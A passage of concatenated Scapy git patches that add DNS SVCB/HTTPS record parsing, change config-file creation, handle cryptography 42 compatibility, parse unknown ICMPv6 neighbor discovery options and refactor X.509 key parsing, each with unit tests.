upstream fuzz target and also build packets sent by another fuzzer to resolved. --- scapy/layers/dns.py | 76 +++++++++++++++++++++++++++++++++++++++ test/scapy/layers/dns.uts | 72 +++++++++++++++++++++++++++++++++++++ 2 files changed, 148 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index a1281a6d981..437dec1c57d 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -887,6 +887,80 @@ class DNSRRNSEC3PARAM(_DNSRRdummy): StrLenField("salt", "", length_from=lambda pkt: pkt.saltlength) # noqa: E501 ] + +# RFC 9460 Service Binding and Parameter Specification via the DNS +# https://www.rfc-editor.org/rfc/rfc9460.html + + +# https://www.iana.org/assignments/dns-svcb/dns-svcb.xhtml +svc_param_keys = { + 0: "mandatory", + 1: "alpn", + 2: "no-default-alpn", + 3: "port", + 4: "ipv4hint", + 5: "ech", + 6: "ipv6hint", + 7: "dohpath", + 8: "ohttp", +} + + +class SvcParam(Packet): + name = "SvcParam" + fields_desc = [ShortEnumField("key", 0, svc_param_keys), + FieldLenField("len", None, length_of="value", fmt="H"), + MultipleTypeField( + [ + # mandatory + (FieldListField("value", [], + ShortEnumField("", 0, svc_param_keys), + length_from=lambda pkt: pkt.len), + lambda pkt: pkt.key == 0), + # alpn, no-default-alpn + (DNSTextField("value", [], + length_from=lambda pkt: pkt.len), + lambda pkt: pkt.key in (1, 2)), + # port + (ShortField("value", 0), + lambda pkt: pkt.key == 3), + # ipv4hint + (FieldListField("value", [], + IPField("", "0.0.0.0"), + length_from=lambda pkt: pkt.len), + lambda pkt: pkt.key == 4), + # ipv6hint + (FieldListField("value", [], + IP6Field("", "::"), + length_from=lambda pkt: pkt.len), + lambda pkt: pkt.key == 6), + ], + StrLenField("value", "", + length_from=lambda pkt:pkt.len))] + + def extract_padding(self, p): + return "", p + + +class DNSRRSVCB(_DNSRRdummy): + name = "DNS SVCB Resource Record" + fields_desc = [DNSStrField("rrname", ""), + ShortEnumField("type", 64, dnstypes), + ShortEnumField("rclass", 1, dnsclasses), + IntField("ttl", 0), + ShortField("rdlen", None), + ShortField("svc_priority", 0), + DNSStrField("target_name", ""), + PacketListField("svc_params", [], SvcParam)] + + +class DNSRRHTTPS(_DNSRRdummy): + name = "DNS HTTPS Resource Record" + fields_desc = [DNSStrField("rrname", ""), + ShortEnumField("type", 65, dnstypes) + ] + DNSRRSVCB.fields_desc[2:] + + # RFC 2782 - A DNS RR for specifying the location of services (DNS SRV) @@ -976,6 +1050,8 @@ class DNSRRTSIG(_DNSRRdummy): 48: DNSRRDNSKEY, # RFC 4034 50: DNSRRNSEC3, # RFC 5155 51: DNSRRNSEC3PARAM, # RFC 5155 + 64: DNSRRSVCB, # RFC 9460 + 65: DNSRRHTTPS, # RFC 9460 250: DNSRRTSIG, # RFC 2845 32769: DNSRRDLV, # RFC 4431 } diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index ed4d79df81c..e89b691b2f9 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -243,6 +243,78 @@ assert DNSRR(raw(rr)).rdata == [] rr = DNSRR(rrname='scapy', type='TXT', rdata=[]) assert raw(rr) == b += DNS record type 64, 65 (SVCB, HTTPS) + +b = b'\x00\x00\x00\x04\x00\x01\x00\x06' +p = SvcParam(b) +assert p.key == 0 and p.value == [1, 6] +assert b == raw(SvcParam(key='mandatory', value=['alpn', 'ipv6hint'])) + +b = b'\x00\x01\x00\x06\x02h3\x02h2' +p = SvcParam(b) +assert p.key == 1 and p.value == [b'h3', b'h2'] +assert b == raw(SvcParam(key='alpn', value=['h3', 'h2'])) + +b = b'\x00\x02\x00\x00' +p = SvcParam(b) +assert p.key == 2 and p.value == [] +assert b == raw(SvcParam(key='no-default-alpn')) + +b = b'\x00\x03\x00\x02\x04\xd2' +p = SvcParam(b) +assert p.key == 3 and p.value == 1234 +assert b == raw(SvcParam(key='port', value=1234)) + +b = b'\x00\x04\x00\x08\xc0\xa8\x00\x01\xc0\xa8\x00\x02' +p = SvcParam(b) +assert p.key == 4 and p.value == ['192.168.0.1', '192.168.0.2'] +assert b == raw(SvcParam(key='ipv4hint', value=['192.168.0.1', '192.168.0.2'])) + +b = b'\x00\x06\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +p = SvcParam(b) +assert p.key == 6 and p.value == ['2001:db8::1'] +assert b == raw(SvcParam(key='ipv6hint', value=['2001:db8::1'])) + +b = b'\x00\x07\x00\x10/dns-query{?dns}' +p = SvcParam(b) +assert p.key == 7 and p.value == b'/dns-query{?dns}' +assert b == raw(SvcParam(key='dohpath', value=b'/dns-query{?dns}')) + +p = DNSRRSVCB() +assert p.rrname == b'.' and p.type == 64 and p.svc_priority == 0 and p.svc_params == [] + +p = DNSRRHTTPS() +assert p.rrname == b'.' and p.type == 65 and p.svc_priority == 0 and p.svc_params == [] + +# Real-world SVCB RR +b = b'\x04_dns\x03one\x03one\x03one\x03one\x00\x00@\x00\x01\x00\x00\x01,\x001\x00\x01\x03one\x03one\x03one\x03one\x00\x00\x01\x00\x06\x02h3\x02h2\x00\x07\x00\x10/dns-query{?dns}' +p = DNSRRSVCB(b) +assert p.type == 64 and p.ttl == 300 and p.svc_priority == 1 and p.target_name == b'one.one.one.one.' + +alpn = SvcParam(key='alpn', value=['h3', 'h2']) +dohpath = SvcParam(key='dohpath', value=b'/dns-query{?dns}') + +assert raw(p.svc_params[0]) == raw(alpn) +assert raw(p.svc_params[1]) == raw(dohpath) + +assert b == raw(DNSRRSVCB(rrname='_dns.one.one.one.one', ttl=300, svc_priority=1, target_name='one.one.one.one', svc_params=[alpn, dohpath])) + +# Real-world HTTPS RR +b = b'\ncloudflare\x03com\x00\x00A\x00\x01\x00\x00\x00>\x00=\x00\x01\x00\x00\x01\x00\x06\x02h3\x02h2\x00\x04\x00\x08h\x10\x84\xe5h\x10\x85\xe5\x00\x06\x00 &\x06G\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x10\x84\xe5&\x06G\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x10\x85\xe5' + +p = DNSRRHTTPS(b) +assert p.type == 65 and p.ttl == 62 and p.svc_priority == 1 and p.target_name == b'.' + +alpn = SvcParam(key='alpn', value=['h3', 'h2']) +ipv4hint = SvcParam(key='ipv4hint', value=['104.16.132.229', '104.16.133.229']) +ipv6hint = SvcParam(key='ipv6hint', value=['2606:4700::6810:84e5', '2606:4700::6810:85e5']) + +assert raw(p.svc_params[0]) == raw(alpn) +assert raw(p.svc_params[1]) == raw(ipv4hint) +assert raw(p.svc_params[2]) == raw(ipv6hint) + +assert b == raw(DNSRRHTTPS(rrname='cloudflare.com', ttl=62, svc_priority=1, target_name='.', svc_params=[alpn, ipv4hint, ipv6hint])) + = DNS - Malformed DNS over TCP message _old_dbg = conf.debug_dissector From d71014a5adf8fe7144408f78402bd1ca40e9b4a7 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 17 Jan 2024 02:07:45 +0100 Subject: [PATCH 1156/1632] Only create default config file in interactive mode (#4218) This fixes macOS unit tests, and makes a bit more sense. --- scapy/main.py | 45 ++++++++++++++++++++++++--------------------- test/regression.uts | 11 +++++++---- 2 files changed, 31 insertions(+), 25 deletions(-) diff --git a/scapy/main.py b/scapy/main.py index 0b33007b0f2..2cb176ceee1 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -64,27 +64,18 @@ ] -def _probe_config_file(*cf, default=None): - # type: (str, Optional[str]) -> Union[str, None] +def _probe_config_file(*cf): + # type: (str) -> Union[str, None] path = pathlib.Path(os.path.expanduser("~")) if not path.exists(): # ~ folder doesn't exist. Unsalvageable return None - cf_path = path.joinpath(*cf) - if not cf_path.exists(): - if default is not None: - # We have a default ! set it - cf_path.parent.mkdir(parents=True, exist_ok=True) - with cf_path.open("w") as fd: - fd.write(default) - return str(cf_path.resolve()) - return None - return str(cf_path.resolve()) + return str(path.joinpath(*cf).resolve()) def _read_config_file(cf, _globals=globals(), _locals=locals(), - interactive=True): - # type: (str, Dict[str, Any], Dict[str, Any], bool) -> None + interactive=True, default=None): + # type: (str, Dict[str, Any], Dict[str, Any], bool, Optional[str]) -> None """Read a config file: execute a python file while loading scapy, that may contain some pre-configured values. @@ -93,11 +84,13 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), function. Otherwise, vars are only available from inside the scapy console. - params: - - _globals: the globals() vars - - _locals: the locals() vars - - interactive: specified whether or not errors should be printed + Parameters: + + :param _globals: the globals() vars + :param _locals: the locals() vars + :param interactive: specified whether or not errors should be printed using the scapy console or raised. + :param default: if provided, set a default value for the config file ex, content of a config.py file: 'conf.verb = 42\n' @@ -107,6 +100,16 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), 2 """ + cf_path = pathlib.Path(cf) + if not cf_path.exists(): + log_loading.debug("Config file [%s] does not exist.", cf) + if default is None: + return + # We have a default ! set it + cf_path.parent.mkdir(parents=True, exist_ok=True) + with cf_path.open("w") as fd: + fd.write(default) + log_loading.debug("Config file [%s] created with default.", cf) log_loading.debug("Loading config file [%s]", cf) try: with open(cf) as cfgf: @@ -151,8 +154,7 @@ def _validate_local(k): # conf.use_pcap = True """.strip() -DEFAULT_PRESTART_FILE = _probe_config_file(".config", "scapy", "prestart.py", - default=DEFAULT_PRESTART) +DEFAULT_PRESTART_FILE = _probe_config_file(".config", "scapy", "prestart.py") DEFAULT_STARTUP_FILE = _probe_config_file(".config", "scapy", "startup.py") @@ -718,7 +720,8 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): _read_config_file( PRESTART_FILE, interactive=True, - _locals=_scapy_prestart_builtins() + _locals=_scapy_prestart_builtins(), + default=DEFAULT_PRESTART, ) SESSION = init_session(session_name, mydict=mydict, ret=True) diff --git a/test/regression.uts b/test/regression.uts index 9a09899d972..3d0e3bd92b5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -651,7 +651,8 @@ assert len(conf.temp_files) == 0 import mock, sys from scapy.main import interact -from scapy.main import DEFAULT_PRESTART_FILE +from scapy.main import DEFAULT_PRESTART_FILE, DEFAULT_PRESTART, _read_config_file +_read_config_file(DEFAULT_PRESTART_FILE, _locals=globals(), default=DEFAULT_PRESTART) # By now .config/scapy/startup.py should have been created with open(DEFAULT_PRESTART_FILE, "r") as fd: OLD_DEFAULT_PRESTART = fd.read() @@ -691,7 +692,8 @@ interact_emulator(extra_args=["-d"]) # Extended import sys import mock -from scapy.main import DEFAULT_PRESTART_FILE +from scapy.main import DEFAULT_PRESTART_FILE, DEFAULT_PRESTART, _read_config_file +_read_config_file(DEFAULT_PRESTART_FILE, _locals=globals(), default=DEFAULT_PRESTART) # By now .config/scapy/startup.py should have been created with open(DEFAULT_PRESTART_FILE, "w+") as fd: fd.write("conf.interactive_shell = 'ptpython'") @@ -1093,6 +1095,7 @@ assert "NameError" in ret[0] cmds = """log_runtime.info(hex_bytes("446166742050756e6b"))\n""" ret = autorun_get_text_interactive_session(cmds) +ret assert "Daft Punk" in ret[0] = Test utility TEX functions @@ -1122,8 +1125,8 @@ conf.verb = saved_conf_verb = Test config file functions failures -from scapy.main import _probe_config_file -assert _probe_config_file("filethatdoesnotexistnorwillever.tsppajfsrdrr") is None +from scapy.main import _read_config_file, _probe_config_file +assert _read_config_file(_probe_config_file("filethatdoesnotexistnorwillever.tsppajfsrdrr")) is None = Test CacheInstance repr From ae79fcba3107ef3cd40aed437fe921a853b6ad6e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 27 Jan 2024 01:31:10 +0100 Subject: [PATCH 1157/1632] Support cryptography>=42.0 (and restore TLS tests) --- scapy/layers/tls/crypto/groups.py | 44 +++++++++---------------------- test/configs/cryptography.utsc | 2 +- test/scapy/layers/dot11.uts | 2 +- 3 files changed, 15 insertions(+), 33 deletions(-) diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index a644acde10a..7bbb80f26a6 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -22,39 +22,11 @@ from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import dh, ec from cryptography.hazmat.primitives import serialization + from cryptography.hazmat.primitives.asymmetric.dh import DHParameterNumbers if conf.crypto_valid_advanced: from cryptography.hazmat.primitives.asymmetric import x25519 from cryptography.hazmat.primitives.asymmetric import x448 -# We have to start by a dirty hack in order to allow long generators, -# which some versions of openssl love to use... - -if conf.crypto_valid: - from cryptography.hazmat.primitives.asymmetric.dh import DHParameterNumbers - - try: - # We test with dummy values whether the size limitation has been removed. # noqa: E501 - pn_test = DHParameterNumbers(2, 7) - except ValueError: - # We get rid of the limitation through the cryptography v1.9 __init__. - - def DHParameterNumbers__init__hack(self, p, g, q=None): - if ( - not isinstance(p, int) or - not isinstance(g, int) - ): - raise TypeError("p and g must be integers") - if q is not None and not isinstance(q, int): - raise TypeError("q must be integer or None") - - self._p = p - self._g = g - self._q = q - - DHParameterNumbers.__init__ = DHParameterNumbers__init__hack - - # End of hack. - _ffdh_groups = {} @@ -459,7 +431,12 @@ def _tls_named_groups_import(group, pubbytes): import_point = x448.X448PublicKey.from_public_bytes return import_point(pubbytes) else: - curve = ec._CURVE_TYPES[_tls_named_curves[group]]() + curve = ec._CURVE_TYPES[_tls_named_curves[group]] + try: + # cryptography < 42 + curve = curve() + except TypeError: + pass try: # cryptography >= 2.5 return ec.EllipticCurvePublicKey.from_encoded_point( curve, @@ -516,7 +493,12 @@ def _tls_named_groups_generate(group): "Your cryptography version doesn't support " + group_name ) else: - curve = ec._CURVE_TYPES[_tls_named_curves[group]]() + curve = ec._CURVE_TYPES[_tls_named_curves[group]] + try: + # cryptography < 42 + curve = curve() + except TypeError: + pass return ec.generate_private_key(curve, default_backend()) # Below lies ghost code since the shift from 'ecdsa' to 'cryptography' lib. diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index debb353a173..894e23977d1 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -1,6 +1,6 @@ { "testfiles": [ - "test/tls*.uts", + "test/scapy/layers/tls/tls*.uts", "test/scapy/layers/dot11.uts", "test/scapy/layers/ipsec.uts", "test/contrib/macsec.uts" diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index c9860f3b8f4..e967cfbd338 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -484,7 +484,7 @@ assert isinstance(p, Dot11WEP) conf.crypto_valid = bck_conf_crypto_valid conf.wepkey = "Fobar" -r = raw(Dot11WEP()/LLC()/SNAP()/IP()/TCP(seq=12345678)) +r = raw(Dot11WEP()/LLC()/SNAP()/IP(src="127.0.0.1", dst="127.0.0.1")/TCP(seq=12345678)) r assert r == b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd' p = Dot11WEP(r) From 5a1abdc4cee779cf3a8afd337aace8917ab66127 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 28 Jan 2024 14:15:18 +0300 Subject: [PATCH 1158/1632] [inet6] recognize unknown router advertisement options (#4233) --- scapy/layers/inet6.py | 57 +++++++++++++++++++------------------ test/scapy/layers/inet6.uts | 42 +++++++++++++++++++++------ 2 files changed, 63 insertions(+), 36 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index d795bef446e..6cab5db038b 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1737,18 +1737,41 @@ class _ICMPv6NDGuessPayload: def guess_payload_class(self, p): if len(p) > 1: - return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501 + return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) # Beginning of ICMPv6 Neighbor Discovery Options. +class ICMPv6NDOptDataField(StrLenField): + __slots__ = ["strip_zeros"] + + def __init__(self, name, default, strip_zeros=False, **kwargs): + super().__init__(name, default, **kwargs) + self.strip_zeros = strip_zeros + + def i2len(self, pkt, x): + return len(self.i2m(pkt, x)) + + def i2m(self, pkt, x): + r = (len(x) + 2) % 8 + if r: + x += b"\x00" * (8 - r) + return x + + def m2i(self, pkt, x): + if self.strip_zeros: + x = x.rstrip(b"\x00") + return x + + class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" fields_desc = [ByteField("type", None), FieldLenField("len", None, length_of="data", fmt="B", - adjust=lambda pkt, x: x + 2), - StrLenField("data", "", - length_from=lambda pkt: pkt.len - 2)] + adjust=lambda pkt, x: (2 + x) // 8), + ICMPv6NDOptDataField("data", "", strip_zeros=False, + length_from=lambda pkt: + 8 * max(pkt.len, 1) - 2)] # NOTE: len includes type and len field. Expressed in unit of 8 bytes # TODO: Revoir le coup du ETHER_ANY @@ -2059,34 +2082,14 @@ def mysummary(self): return self.sprintf("%name% ") + ", ".join(self.searchlist) -# URI MUST be padded with NUL (0x00) to make the total option length -# (including the Type and Length fields) a multiple of 8 bytes. -# https://www.rfc-editor.org/rfc/rfc8910.html#name-the-captive-portal-ipv6-ra- -class CaptivePortalURI(StrLenField): - def i2len(self, pkt, x): - return len(self.i2m(pkt, x)) - - def i2m(self, pkt, x): - r = (len(x) + 2) % 8 - if r: - x += b"\x00" * (8 - r) - return x - - def m2i(self, pkt, x): - return x.rstrip(b"\x00") - - class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" fields_desc = [ByteField("type", 37), FieldLenField("len", None, length_of="URI", fmt="B", adjust=lambda pkt, x: (2 + x) // 8), - - # Zero length is nonsensical but it's treated as 1 here to - # let the dissector skip bogus options more or less gracefully - CaptivePortalURI("URI", "", - length_from=lambda pkt: 8 * max(pkt.len, 1) - 2) - ] + ICMPv6NDOptDataField("URI", "", strip_zeros=True, + length_from=lambda pkt: + 8 * max(pkt.len, 1) - 2)] def mysummary(self): return self.sprintf("%name% %URI%") diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 3c06be0c117..4311f0b2cb4 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -780,18 +780,40 @@ b.answers(a) + ICMPv6NDOptUnknown Class Test = ICMPv6NDOptUnknown - Basic Instantiation -raw(ICMPv6NDOptUnknown()) == b'\x00\x02' +b = b'\x00\x01\x00\x00\x00\x00\x00\x00' + +raw(ICMPv6NDOptUnknown()) == b = ICMPv6NDOptUnknown - Instantiation with specific values -raw(ICMPv6NDOptUnknown(len=4, data="somestring")) == b'\x00\x04somestring' +raw(ICMPv6NDOptUnknown(data="somestring")) == b'\x00\x02somestring\x00\x00\x00\x00' = ICMPv6NDOptUnknown - Basic Dissection -a=ICMPv6NDOptUnknown(b'\x00\x02') -a.type == 0 and a.len == 2 +b = b'\x00\x01\x00\x00\x00\x00\x00\x00' + +p = ICMPv6NDOptUnknown(b) +p.type == 0 and p.len == 1 and p.data == b'\x00' * 6 + +p = ICMPv6NDOptUnknown(b + b'\x00') +assert Raw in p and raw(p[Raw]) == b'\x00' + +p = ICMPv6NDOptUnknown(b + b'\x00\x00') +assert raw(p[ICMPv6NDOptUnknown:2]) == b'\x00\x00' = ICMPv6NDOptUnknown - Dissection with specific values -a=ICMPv6NDOptUnknown(b'\x00\x04somerawing') -a.type == 0 and a.len==4 and a.data == b"so" and isinstance(a.payload, Raw) and a.payload.load == b"merawing" +p = ICMPv6NDOptUnknown(b'\x00\x01string') +assert p.type == 0 and p.len == 1 and p.data == b'string' + +p = ICMPv6NDOptUnknown(b'\x00\x04somestring') +assert p.type == 0 and p.len == 4 and p.data == b'somestring' + += ICMPv6NDOptUnknown - Instantiation/Dissection with unknown option in the middle +b = b'\x01\x01\x00\x00\x00\x00\x00\x00\x00\x02somestring\x00\x00\x00\x00%\x01\x00\x00\x00\x00\x00\x00' + +p = ICMPv6NDOptSrcLLAddr()/ICMPv6NDOptUnknown(data='somestring')/ICMPv6NDOptCaptivePortal() +assert raw(p) == b + +p = ICMPv6NDOptSrcLLAddr(b)[ICMPv6NDOptUnknown] +assert p.type == 0 and p.len == 2 and p.data == b'somestring\x00\x00\x00\x00' ############ @@ -1231,8 +1253,10 @@ p = ICMPv6NDOptCaptivePortal(b"\x25\x03https://example.com\x00\x00\x00") p.type == 37 and p.len == 3 and p.URI == b"https://example.com" = ICMPv6NDOptCaptivePortal - Dissection with zero length -p = ICMPv6NDOptCaptivePortal(b"\x25\x00abcdefgh") -p.type == 37 and p.len == 0 and p.URI == b"abcdef" and Raw in p and len(p[Raw]) == 2 +p = ICMPv6NDOptCaptivePortal(b"\x25\x00abcdef\x00\x01") +p.type == 37 and p.len == 0 and p.URI == b"abcdef" +pay = p.payload +assert pay.type == 0 and pay.len == 1 and pay.data == b"" = ICMPv6NDOptCaptivePortal - Summary Output ICMPv6NDOptCaptivePortal(URI="https://example.com").mysummary() == "ICMPv6 Neighbor Discovery Option - Captive-Portal Option b'https://example.com'" @@ -1269,7 +1293,7 @@ p = ICMPv6NDOptPREF64(raw(p)) assert p.type == 38 and p.len == 2 and p.scaledlifetime == 225 and p.plc == 1 and p.prefix == '2003:da8:1::' p = ICMPv6NDOptPREF64(raw(p) + b'\x00\x00\x00\x00') -assert Raw in p and len(p[Raw]) == 4 +assert ICMPv6NDOptUnknown in p and len(p[ICMPv6NDOptUnknown]) == 4 = ICMPv6NDOptPREF64 - Summary Output ICMPv6NDOptPREF64(prefix='12:34:56::', plc='/32').mysummary() == "ICMPv6 Neighbor Discovery Option - PREF64 Option 12:34:56::/32" From 11787b78dcc356bb39647b641b01387bec332b94 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 30 Jan 2024 18:48:03 +0300 Subject: [PATCH 1159/1632] packet: don't always skip empty values in .command() (#4238) This patch fixes an issue where empty lists assigned explicitly to override non-empty default values weren't present in commands generated by Packet.command and the packets were different. For example `DNS(qd=[]).command()` generated `DNS()` and it turned into packets with the default "example.com IN A" query. With this patch applied it generates `DNS(qd=[])`. --- scapy/packet.py | 2 +- test/scapy/layers/dns.uts | 8 ++++++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index 6759dfc4c8c..37295cc8f6d 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1693,7 +1693,7 @@ def command(self): f = [] for fn, fv in self.fields.items(): fld = self.get_field(fn) - if isinstance(fv, (list, dict, set)) and len(fv) == 0: + if isinstance(fv, (list, dict, set)) and not fv and not fld.default: continue if isinstance(fv, Packet): fv = fv.command() diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index e89b691b2f9..0c0093b45a2 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -414,3 +414,11 @@ assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' pkt = DNS(qr=1, qd=None, aa=1, rd=1) pkt = DNS(bytes(pkt)) assert pkt.qd == [] + += DNS - command + +p = DNS() +assert p == eval(p.command()) + +p = DNS(qd=[]) +assert p == eval(p.command()) From e2e4d2db53c65170e50984d9ce33bef8fa0d416d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 30 Jan 2024 16:52:15 +0100 Subject: [PATCH 1160/1632] Fix MultipleTypeField on ASN.1 packets and OSCP (#4222) (#4223) --- scapy/asn1fields.py | 18 ++- scapy/fields.py | 4 + scapy/layers/x509.py | 227 +++++++------------------------------ test/scapy/layers/x509.uts | 7 ++ 4 files changed, 65 insertions(+), 191 deletions(-) diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 6cd782a9ed8..0555204513c 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -110,6 +110,11 @@ def __init__(self, self.explicit_tag = explicit_tag # network_tag gets useful for ASN1F_CHOICE self.network_tag = int(implicit_tag or explicit_tag or self.ASN1_tag) + self.owners = [] # type: List[Type[ASN1_Packet]] + + def register_owner(self, cls): + # type: (Type[ASN1_Packet]) -> None + self.owners.append(cls) def i2repr(self, pkt, x): # type: (ASN1_Packet, _I) -> str @@ -884,12 +889,13 @@ def m2i(self, pkt, s): # type: ignore return p, remain def i2m(self, pkt, x): # type: ignore - # type: (ASN1_Packet, Optional[ASN1_Packet]) -> bytes - s = b"" if x is None else raw(x) - return super(ASN1F_BIT_STRING_ENCAPS, self).i2m( - pkt, - ASN1_BIT_STRING(s, readable=True) - ) + # type: (ASN1_Packet, Optional[ASN1_BIT_STRING]) -> bytes + if not isinstance(x, ASN1_BIT_STRING): + x = ASN1_BIT_STRING( + b"" if x is None else bytes(x), # type: ignore + readable=True, + ) + return super(ASN1F_BIT_STRING_ENCAPS, self).i2m(pkt, x) class ASN1F_FLAGS(ASN1F_BIT_STRING): diff --git a/scapy/fields.py b/scapy/fields.py index f082be247e1..a97b2d75df5 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -595,6 +595,10 @@ def register_owner(self, cls): fld.owners.append(cls) self.dflt.owners.append(cls) + def get_fields_list(self): + # type: () -> List[Any] + return [self] + @property def fld(self): # type: () -> Field[Any, Any] diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index b46c9e3cf45..bae8ad49356 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -25,7 +25,7 @@ ASN1F_UTF8_STRING, ASN1F_badsequence, ASN1F_enum_INTEGER, ASN1F_field, \ ASN1F_optional from scapy.packet import Packet -from scapy.fields import PacketField +from scapy.fields import PacketField, MultipleTypeField from scapy.volatile import ZuluTime, GeneralizedTime from scapy.compat import plain_str @@ -764,63 +764,25 @@ class X509_AlgorithmIdentifier(ASN1_Packet): ASN1F_NULL, ECParameters))) -class ASN1F_X509_SubjectPublicKeyInfoRSA(ASN1F_SEQUENCE): - def __init__(self, **kargs): - seq = [ASN1F_PACKET("signatureAlgorithm", - X509_AlgorithmIdentifier(), - X509_AlgorithmIdentifier), - ASN1F_BIT_STRING_ENCAPS("subjectPublicKey", - RSAPublicKey(), - RSAPublicKey)] - ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - - -class ASN1F_X509_SubjectPublicKeyInfoECDSA(ASN1F_SEQUENCE): - def __init__(self, **kargs): - seq = [ASN1F_PACKET("signatureAlgorithm", - X509_AlgorithmIdentifier(), - X509_AlgorithmIdentifier), - ASN1F_PACKET("subjectPublicKey", ECDSAPublicKey(), - ECDSAPublicKey)] - ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - - class ASN1F_X509_SubjectPublicKeyInfo(ASN1F_SEQUENCE): def __init__(self, **kargs): seq = [ASN1F_PACKET("signatureAlgorithm", X509_AlgorithmIdentifier(), X509_AlgorithmIdentifier), - ASN1F_BIT_STRING("subjectPublicKey", None)] + MultipleTypeField( + [ + (ASN1F_BIT_STRING_ENCAPS("subjectPublicKey", + RSAPublicKey(), + RSAPublicKey), + lambda pkt: "rsa" in pkt.signatureAlgorithm.algorithm.oidname.lower()), # noqa: E501 + (ASN1F_PACKET("subjectPublicKey", + ECDSAPublicKey(), + ECDSAPublicKey), + lambda pkt: "ecPublicKey" == pkt.signatureAlgorithm.algorithm.oidname), # noqa: E501 + ], + ASN1F_BIT_STRING("subjectPublicKey", ""))] ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - def m2i(self, pkt, x): - c, s = ASN1F_SEQUENCE.m2i(self, pkt, x) - keytype = pkt.fields["signatureAlgorithm"].algorithm.oidname - if "rsa" in keytype.lower(): - return ASN1F_X509_SubjectPublicKeyInfoRSA().m2i(pkt, x) - elif keytype == "ecPublicKey": - return ASN1F_X509_SubjectPublicKeyInfoECDSA().m2i(pkt, x) - else: - raise Exception("could not parse subjectPublicKeyInfo") - - def dissect(self, pkt, s): - c, x = self.m2i(pkt, s) - return x - - def build(self, pkt): - if "signatureAlgorithm" in pkt.fields: - ktype = pkt.fields['signatureAlgorithm'].algorithm.oidname - else: - ktype = pkt.default_fields["signatureAlgorithm"].algorithm.oidname - if "rsa" in ktype.lower(): - pkt.default_fields["subjectPublicKey"] = RSAPublicKey() - return ASN1F_X509_SubjectPublicKeyInfoRSA().build(pkt) - elif ktype == "ecPublicKey": - pkt.default_fields["subjectPublicKey"] = ECDSAPublicKey() - return ASN1F_X509_SubjectPublicKeyInfoECDSA().build(pkt) - else: - raise Exception("could not build subjectPublicKeyInfo") - class X509_SubjectPublicKeyInfo(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -1004,20 +966,6 @@ def get_subject_str(self): return name_str -class ASN1F_X509_CertECDSA(ASN1F_SEQUENCE): - def __init__(self, **kargs): - seq = [ASN1F_PACKET("tbsCertificate", - X509_TBSCertificate(), - X509_TBSCertificate), - ASN1F_PACKET("signatureAlgorithm", - X509_AlgorithmIdentifier(), - X509_AlgorithmIdentifier), - ASN1F_BIT_STRING_ENCAPS("signatureValue", - ECDSASignature(), - ECDSASignature)] - ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - - class ASN1F_X509_Cert(ASN1F_SEQUENCE): def __init__(self, **kargs): seq = [ASN1F_PACKET("tbsCertificate", @@ -1026,37 +974,17 @@ def __init__(self, **kargs): 